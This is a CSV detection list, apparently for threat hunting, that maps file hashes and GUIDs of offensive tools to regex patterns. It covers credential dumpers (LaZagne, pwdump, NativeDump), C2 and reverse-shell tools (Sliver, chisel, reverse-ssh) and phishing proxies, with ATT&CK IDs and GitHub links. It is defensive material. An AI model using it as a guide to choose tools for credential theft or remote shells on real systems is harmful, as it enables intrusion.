"*44acd66093e5cc54cdd68c183815d7c16b48b82aadd03c03bb01f3e03adf17c1*",".{0,1000}44acd66093e5cc54cdd68c183815d7c16b48b82aadd03c03bb01f3e03adf17c1.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*44ae9957842a29e354e2a64874bad57eb1790ed15ce345184ee8773c1e380e3a*",".{0,1000}44ae9957842a29e354e2a64874bad57eb1790ed15ce345184ee8773c1e380e3a.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*44D5BE95-F34D-4CC5-846F-C7758943B8FA*",".{0,1000}44D5BE95\-F34D\-4CC5\-846F\-C7758943B8FA.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*44fad118e1e7776c04d4a8fa8174ff5316ab5fa23b0e58e5c8a15c50f04ed365*",".{0,1000}44fad118e1e7776c04d4a8fa8174ff5316ab5fa23b0e58e5c8a15c50f04ed365.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*453c7fcdf6fdf446f846057eb2cd90b495caaf442aa07dbeb9655482809fef43*",".{0,1000}453c7fcdf6fdf446f846057eb2cd90b495caaf442aa07dbeb9655482809fef43.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*4551550ffe88fdd08a358197d4e3da663bca78d6896484bbf081cb70b794f27b*",".{0,1000}4551550ffe88fdd08a358197d4e3da663bca78d6896484bbf081cb70b794f27b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*4563bdbbc58eb60d27a45341223221e593db4873f378a3b018f86998187debe7*",".{0,1000}4563bdbbc58eb60d27a45341223221e593db4873f378a3b018f86998187debe7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4581d0993624a9dab870f29d66f0acb39db89b818de62d8f345de3155340066f*",".{0,1000}4581d0993624a9dab870f29d66f0acb39db89b818de62d8f345de3155340066f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*45a81bd15482f0fa6be511d3590b8c8d550e80362b5dfe10edc2488043c48cbc*",".{0,1000}45a81bd15482f0fa6be511d3590b8c8d550e80362b5dfe10edc2488043c48cbc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*45cc6eff2c3a6facb1aa9e31f2ce7d45d7b5527633c54d9deb5de1f19ffc906d*",".{0,1000}45cc6eff2c3a6facb1aa9e31f2ce7d45d7b5527633c54d9deb5de1f19ffc906d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*45D59D79-EF51-4A93-AAFA-2879FFC3A62C*",".{0,1000}45D59D79\-EF51\-4A93\-AAFA\-2879FFC3A62C.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*45ea038d3721285f2759d8c8f3740cbb9cb9400a0cf76d11d84e089bd99ed1a9*",".{0,1000}45ea038d3721285f2759d8c8f3740cbb9cb9400a0cf76d11d84e089bd99ed1a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*45ebedf8240705e9da3b89591d6e0203764e94a1ba5ebaf999627012e06bebd3*",".{0,1000}45ebedf8240705e9da3b89591d6e0203764e94a1ba5ebaf999627012e06bebd3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4614a6da343623fc820d89d35b8c2a26fe69abf357af7ef7602e52808fbe8611*",".{0,1000}4614a6da343623fc820d89d35b8c2a26fe69abf357af7ef7602e52808fbe8611.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*46281222e0c038fb6b34921405aa98b5adc07d97f0074e1eb9488cab9b6b7778*",".{0,1000}46281222e0c038fb6b34921405aa98b5adc07d97f0074e1eb9488cab9b6b7778.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*464b89245a6eb6429d6588c6f9b15e5a158e41be1f7ae9ccb6e3b3ba0ca6106d*",".{0,1000}464b89245a6eb6429d6588c6f9b15e5a158e41be1f7ae9ccb6e3b3ba0ca6106d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4665bf3f84b00ec83f005ea4feb3617acf032a69826013656a04683865c204f6*",".{0,1000}4665bf3f84b00ec83f005ea4feb3617acf032a69826013656a04683865c204f6.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","file_hash","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*4672ac01c62257129756f1d9f0ae1fd2471de6f78e47fa906af47e22204d917b*",".{0,1000}4672ac01c62257129756f1d9f0ae1fd2471de6f78e47fa906af47e22204d917b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf*",".{0,1000}4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*469796062be14876fd4a7f37c4cab22bac6ccee6a9c3e90c696b5901fe22f13a*",".{0,1000}469796062be14876fd4a7f37c4cab22bac6ccee6a9c3e90c696b5901fe22f13a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*46c816bb93ab1d318a84b7295969a7b9d2b8a728f5a6af52126119cc74d26d0a*",".{0,1000}46c816bb93ab1d318a84b7295969a7b9d2b8a728f5a6af52126119cc74d26d0a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*46c81a0250992cc04c2ee1ce3253fd4629e6ae25da1cecdbfe0427b5aa3157c4*",".{0,1000}46c81a0250992cc04c2ee1ce3253fd4629e6ae25da1cecdbfe0427b5aa3157c4.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*46d1f15077f064a99b06bb115ba498581828ff8b712b2c41f6eb602538077035*",".{0,1000}46d1f15077f064a99b06bb115ba498581828ff8b712b2c41f6eb602538077035.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*46db2ff1d405f57e52377c5e42b9918d7b00c47ea75a5a77352dacd1d8d0c97a*",".{0,1000}46db2ff1d405f57e52377c5e42b9918d7b00c47ea75a5a77352dacd1d8d0c97a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*46f31a5656b5592c4b37514bf7726bb1d51140b7eab918643a931cd269289b19*",".{0,1000}46f31a5656b5592c4b37514bf7726bb1d51140b7eab918643a931cd269289b19.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*46f917a6a3de5d2b29fd77a842015ac27e6e3ba2faa92395c27666b2721dcaa0*",".{0,1000}46f917a6a3de5d2b29fd77a842015ac27e6e3ba2faa92395c27666b2721dcaa0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*46fd93a2992e8e9a29740d3d116d6d802315e51753f667cd3e462845ddea663c*",".{0,1000}46fd93a2992e8e9a29740d3d116d6d802315e51753f667cd3e462845ddea663c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*470150f91aebe1fd59949728f99b2bb847cf8d1867ca2ee767fef9b7c44e206d*",".{0,1000}470150f91aebe1fd59949728f99b2bb847cf8d1867ca2ee767fef9b7c44e206d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*47164ef76a78406a70ee1b88ae4e31230ace7ee2ba6c3a56b0b9771b75e14fff*",".{0,1000}47164ef76a78406a70ee1b88ae4e31230ace7ee2ba6c3a56b0b9771b75e14fff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4747b86b7a8d2ba61f377e2526d6f2764cb8146be5dd8d6ad42af745dd705c8b*",".{0,1000}4747b86b7a8d2ba61f377e2526d6f2764cb8146be5dd8d6ad42af745dd705c8b.{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003","TA0006","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*474B99B7-66C4-4AC2-8AD3-065DD13DDDFF*",".{0,1000}474B99B7\-66C4\-4AC2\-8AD3\-065DD13DDDFF.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*476FC126-239F-4D58-8389-E1C0E93C2C5E*",".{0,1000}476FC126\-239F\-4D58\-8389\-E1C0E93C2C5E.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*4781b10d0dae27a772518c9167b3a654c46017897bc73ce4540f4bfca33e9b58*",".{0,1000}4781b10d0dae27a772518c9167b3a654c46017897bc73ce4540f4bfca33e9b58.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*47ab8ed046a22fb188930af037aa05a7f74e3e39331d56c32d736589f7ac78b2*",".{0,1000}47ab8ed046a22fb188930af037aa05a7f74e3e39331d56c32d736589f7ac78b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*47eb5cfc14028872dab22f2202be7f5df00288463ca798191286ddb99bf7b34f*",".{0,1000}47eb5cfc14028872dab22f2202be7f5df00288463ca798191286ddb99bf7b34f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*47f65f47bf82b419bd5cc4ef4dc6d538cad4e5006aad4c557d242e31ab492ba4*",".{0,1000}47f65f47bf82b419bd5cc4ef4dc6d538cad4e5006aad4c557d242e31ab492ba4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*47fcecd53c11bc648d564c02592617a6ce400d59c94167eefc9a5f7d86cb645c*",".{0,1000}47fcecd53c11bc648d564c02592617a6ce400d59c94167eefc9a5f7d86cb645c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*482002c785db1a3432ec214464a19042a3f36a21e5617a9901a0eae9f04451f1*",".{0,1000}482002c785db1a3432ec214464a19042a3f36a21e5617a9901a0eae9f04451f1.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*482882bd61c051edd33a9b31d03430d6090bcf031102779c66c7adfc1790d7ee*",".{0,1000}482882bd61c051edd33a9b31d03430d6090bcf031102779c66c7adfc1790d7ee.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*48356997a701c96f9b96b1d2dfc20280771a112f2d03b0266abb12e24562456c*",".{0,1000}48356997a701c96f9b96b1d2dfc20280771a112f2d03b0266abb12e24562456c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*48359bfb6692ea45f075188b2b244fc8fcec4ef7e80d2c2eecae90d5c9cdd04b*",".{0,1000}48359bfb6692ea45f075188b2b244fc8fcec4ef7e80d2c2eecae90d5c9cdd04b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8*",".{0,1000}486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*4870b4163315fa666dea8be03176d76aa215fe33187db45aca984e07b25ca827*",".{0,1000}4870b4163315fa666dea8be03176d76aa215fe33187db45aca984e07b25ca827.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*48736ecb605040b194fb7064d4bb621c38713fd3555a4f09f759ee45e81a2103*",".{0,1000}48736ecb605040b194fb7064d4bb621c38713fd3555a4f09f759ee45e81a2103.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4876fe3093df0f61892c691ecdf0db052d77c461fac698b50d1fd48e927bd2e9*",".{0,1000}4876fe3093df0f61892c691ecdf0db052d77c461fac698b50d1fd48e927bd2e9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 